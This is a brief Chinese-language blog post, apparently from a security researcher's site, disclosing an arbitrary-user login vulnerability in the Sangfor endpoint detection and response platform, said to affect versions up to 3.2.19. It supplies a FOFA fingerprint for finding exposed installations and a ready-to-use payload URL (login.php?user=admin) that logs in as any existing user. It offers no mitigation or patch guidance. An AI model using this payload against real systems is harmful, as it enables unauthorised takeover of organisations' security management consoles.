Posted 2020-09-13Updated 2021-03-03Updated 2021-03-03WEB安全a minute read (About 149 words)0 visits深信服-SANGFOR终端检测响应平台-任意用户登录前两天爆出来的命令执行,今天在给大家爆一个任意用户登录;看源码看到的,我测试的时候可以打到3.2.19版本,后面的版本我就不知道了; fofa指纹:title=”SANGFOR终端检测响应平台” 漏洞利用: 只要用户存在就可以登陆 payload: https://ip/ui/login.php?user=需登录的用户名 列如: https://1.1.1.1:1980/ui/login.php?user=admin 查询完毕以后即可登录平台。 深信服-SANGFOR终端检测响应平台-任意用户登录http://www.ol4three.com/2020/09/13/WEB/Exploit/%E6%B7%B1%E4%BF%A1%E6%9C%8D/%E6%B7%B1%E4%BF%A1%E6%9C%8D-SANGFOR%E7%BB%88%E7%AB%AF%E6%A3%80%E6%B5%8B%E5%93%8D%E5%BA%94%E5%B9%B3%E5%8F%B0-%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95/Authorol4threePosted on2020-09-13Updated on2021-03-03Licensed under sangfor